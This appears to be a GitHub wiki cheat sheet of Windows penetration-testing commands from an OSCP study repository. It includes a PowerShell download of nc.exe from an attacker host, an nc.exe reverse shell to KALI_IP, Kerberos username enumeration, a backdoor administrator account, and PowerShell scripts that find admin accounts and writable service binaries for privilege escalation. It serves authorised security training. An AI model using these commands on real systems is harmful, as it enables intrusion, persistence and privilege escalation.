Windows - A1vinSmith/OSCP-PWK GitHub Wiki
Windows equivalents of common Linux commands, e.g. ls -a is dir /a in cmd or dir -Force in PowerShell (where dir is an alias of Get-ChildItem):
https://www.lemoda.net/windows/windows2unix/windows2unix.html
Check the system version
systeminfo (cmd; its Meterpreter counterpart is sysinfo)
RDP
xfreerdp
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:IP /u:USER /p:'Password'
File Transfer
https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
or
https://academy.hackthebox.eu/module/24
Use kerbrute userenum to enumerate valid domain usernames via Kerberos pre-authentication; it causes no logon failures, so it will not lock accounts. -t 100 is the thread count.
kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100
Listening on the box / reverse ping listener
To confirm blind command execution, capture ICMP on your attacking host: sudo tcpdump -i tun0 icmp (use whatever interface your VPN uses, e.g. utun4 on macOS).
Then ping yourself from the target: ping -n 5 ATTACKER_IP. On Windows -n is the packet count (Linux uses -c for that); without it Windows stops after 4 packets anyway.
Getting reverse shell
Pulling nc.exe onto the target with PowerShell
# https://github.com/moparisthebest/static-curl gives you a real curl binary for Windows; in Windows PowerShell curl is only an alias of Invoke-WebRequest (which is what the line below relies on, -o being accepted as a shortening of -OutFile)
# locate nc.exe on your kali (it ships in /usr/share/windows-resources/binaries) and serve that directory over HTTP
# then, from SQLi command execution or any other command injection, run:
powershell curl http://KALI_IP/nc.exe -o nc.exe
nc.exe KALI_IP PORT -e powershell
rlwrap is better when doing windows
# https://tanguy.ortolo.eu/blog/article88/rlwrap
rlwrap nc -nvlp 4242
Users
list all users: net user (net users works too)
details of one user, including the groups they belong to: net user bob (e.g. net user Guest)
list local groups: net localgroup
members of one group: net localgroup Users (net localgroup Administrators is the one you care about)
add a user and put it in the Administrators group (needs an elevated shell; note that cmd chains commands with & or &&, ; only works in PowerShell, and account creation is logged as events 4720 and 4732)
net user alvin passw0rd! /add && net localgroup administrators alvin /add
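The net user / net localgroup commands above give you one user or one group at a time. The script below, added here as a worked example (it is not code from the wiki or from the OSCP-PWK repo), builds the full picture in one pass: every local account, the local groups it is in, whether it is in BUILTIN\Administrators, and any admin members that are not local accounts (domain principals). It assumes the LocalAccounts module that ships with Windows 10 / Server 2016 and later; the group name 'Administrators' is never compared, the well-known SID S-1-5-32-544 is used instead so the check survives a non-English locale.

```powershell
# Added example, not from the wiki: map every local account to its local groups and flag
# members of BUILTIN\Administrators. Needs the LocalAccounts module (Windows 10 / Server 2016+);
# on older hosts stick to the net user / net localgroup commands above.

# Well-known SID of BUILTIN\Administrators, independent of the display language.
$adminGroupSid = 'S-1-5-32-544'

# Get-LocalGroupMember is per group, so build one lookup of member SID -> group names
# (and SID -> display name) instead of querying once per user.
$membership = @{}
$names      = @{}
$adminSids  = @()
foreach ($group in Get-LocalGroup) {
    try {
        $members = @(Get-LocalGroupMember -SID $group.SID -ErrorAction Stop)
    } catch {
        # Throws when a group holds an orphaned SID (e.g. a deleted domain account).
        Write-Warning "Could not enumerate $($group.Name): $($_.Exception.Message)"
        continue
    }
    foreach ($m in $members) {
        $key = $m.SID.Value
        if (-not $membership.ContainsKey($key)) { $membership[$key] = @() }
        $membership[$key] += $group.Name
        $names[$key] = $m.Name
        if ($group.SID.Value -eq $adminGroupSid) { $adminSids += $key }
    }
}

# One row per local user, enabled admins first: those are the accounts worth going after.
$localUsers = @(Get-LocalUser)
$report = foreach ($u in $localUsers) {
    $sid    = $u.SID.Value
    $groups = if ($membership.ContainsKey($sid)) { $membership[$sid] } else { @() }
    [pscustomobject]@{
        Name      = $u.Name
        Enabled   = $u.Enabled
        IsAdmin   = ($adminSids -contains $sid)
        LastLogon = $u.LastLogon
        Groups    = ($groups -join ', ')
    }
}
$report |
    Sort-Object @{Expression = 'IsAdmin'; Descending = $true}, @{Expression = 'Enabled'; Descending = $true}, Name |
    Format-Table -AutoSize

# Admin members that are not local users are domain principals (e.g. DOMAIN\Domain Admins).
$localSids = @($localUsers | ForEach-Object { $_.SID.Value })
$adminSids | Where-Object { $localSids -notcontains $_ } | ForEach-Object {
    "Non-local Administrators member: $($names[$_]) ($_)"
}
```

Run it from any user context; reading local users and groups does not need admin rights. Pair the output with whoami /groups to see which of the listed groups the shell you already have is in.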
Cross-compile C/C++ for 64-bit Windows from Kali (the i686-w64-mingw32 variant of the compiler targets 32-bit)
x86_64-w64-mingw32-gcc -o shell.exe ProgramName.c
Check file/folder permissions
icacls C:\path\to\file-or-folder shows the ACEs; look for (F) full control, (M) modify or (W) write granted to Everyone, BUILTIN\Users or NT AUTHORITY\Authenticated Users. (I) marks an inherited entry.
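Checking one path with icacls is fine once you know where to look. The script below, added here as a worked example (not code from the wiki or the OSCP-PWK repo), applies the same check to the place it matters most: every service's binary and the folder it lives in. It reads the ACLs with Get-Acl rather than parsing icacls output, matches principals by well-known SID (Everyone, Authenticated Users, BUILTIN\Users) instead of by display name, and tests for the access-mask bits that let you replace, append to or delete a file, drop a file into a folder, or rewrite the ACL. The path-extraction heuristic for unquoted service paths (everything up to the first .exe) is an assumption of this example.

```powershell
# Added example, not from the wiki: check every service binary and its folder for ACEs that let a
# low-privileged principal write. A writable service binary or folder is the icacls finding that
# turns into privilege escalation (replace the binary, then restart the service or reboot).

$weakSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # NT AUTHORITY\Authenticated Users
    'S-1-5-32-545'   # BUILTIN\Users
)
# WriteData, AppendData, Delete, ChangePermissions, TakeOwnership, plus GENERIC_ALL and
# GENERIC_WRITE, which Get-Acl reports as raw numbers rather than FileSystemRights names.
$writeMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Get-ServiceBinaryPath {
    # Win32_Service.PathName is the full command line; extract just the executable path.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }  # quoted: take what is inside the quotes
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] } # unquoted: up to the first .exe (heuristic)
    return ($PathName -split ' ')[0]
}

function Get-WeakAces {
    # Emit one object per Allow ACE on $Path that grants a weak principal a write-class right.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }  # no READ_CONTROL or missing path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }   # unresolvable identity, ignore
        if ($weakSids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        [pscustomobject]@{ Path = $Path; Identity = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
    }
}

$findings = foreach ($svc in Get-CimInstance Win32_Service) {
    $bin = Get-ServiceBinaryPath $svc.PathName
    if (-not $bin) { continue }
    $dir = Split-Path -Parent $bin
    foreach ($target in @($bin, $dir) | Where-Object { $_ }) {
        foreach ($hit in Get-WeakAces -Path $target) {
            [pscustomobject]@{
                Service  = $svc.Name
                RunsAs   = $svc.StartName
                Path     = $hit.Path
                Identity = $hit.Identity
                Rights   = $hit.Rights
            }
        }
    }
}
$findings | Sort-Object Service, Path | Format-Table -AutoSize
```

A hit on a service that RunsAs LocalSystem is the interesting one; confirm it with icacls on the reported path, and check with whoami /groups that your current token actually carries the matching SID before you overwrite anything.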